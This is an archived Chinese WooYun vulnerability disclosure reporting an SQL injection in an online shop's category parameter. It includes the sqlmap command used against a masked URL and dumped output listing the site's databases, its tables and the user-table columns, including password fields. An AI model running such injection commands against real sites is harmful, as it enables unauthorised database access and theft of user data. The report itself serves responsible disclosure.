乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-08: 细节已通知厂商并且等待厂商处理中 2015-09-10: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-20: 细节向核心白帽子及相关领域专家公开 2015-09-30: 细节向普通白帽子公开 2015-10-10: 细节向实习白帽子公开 2015-10-25: 细节向公众公开
LC风格网SQL注射漏洞
注射sqlmap.py -u "http://**.**.**.**/women?subCate=tops" --dbs
部分数据
available databases [10]:[*] ctmake[*] ecshop[*] information_schema[*] lcshop[*] mysql[*] test[*] test_snatch[*] test_wordpress[*] wordpress2[*] wordpress_onlineDatabase: lcshop[40 tables]+-------------------------------+| auth || auth_roles || auth_user || frag || frag_category || shop || shop_blog || shop_goods || shop_goods_count || shop_goods_imgs || shop_goods_info || shop_goods_sku || shop_goods_sku_attributes || shop_lib_attributes || shop_lib_attributes_settings || shop_lib_brands || shop_lib_categories || shop_lib_coupon || shop_lib_coupon_batch || shop_lib_discount_relation || shop_lib_express || shop_lib_logs || shop_lib_promotion || shop_lib_promotion_type || shop_lib_region || shop_lib_tags || shop_orders || shop_orders_goods || shop_orders_package || shop_orders_returned || shop_orders_settings || shop_orders_settlement || shop_orders_settlement_detail || shop_settings || shop_tags_goods || shop_users || shop_users_cart || shop_users_delivery || shop_users_settings || weixin_menu |+-------------------------------+Database: lcshopTable: shop_users[15 columns]+-------------+------------------------------+| Column | Type |+-------------+------------------------------+| identity | enum('NONE','BRAND','STAFF') || level | enum('USER','ADMIN') || avatar | varchar(255) || birthday | int(10) || create_time | int(10) || email | varchar(255) || gender | enum('male','female') || id | bigint(20) unsigned || intro | varchar(500) || location | varchar(255) || name_in_url | varchar(100) || nick_name | varchar(100) || password | varchar(120) || real_name | varchar(100) || status | enum('NORMAL','LOCK','BAD') |+-------------+------------------------------+
太杂乱了,懒得找了。。。
综上
你们懂
危害等级:中
漏洞Rank:8
确认时间:2015-09-10 19:19
CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。
暂无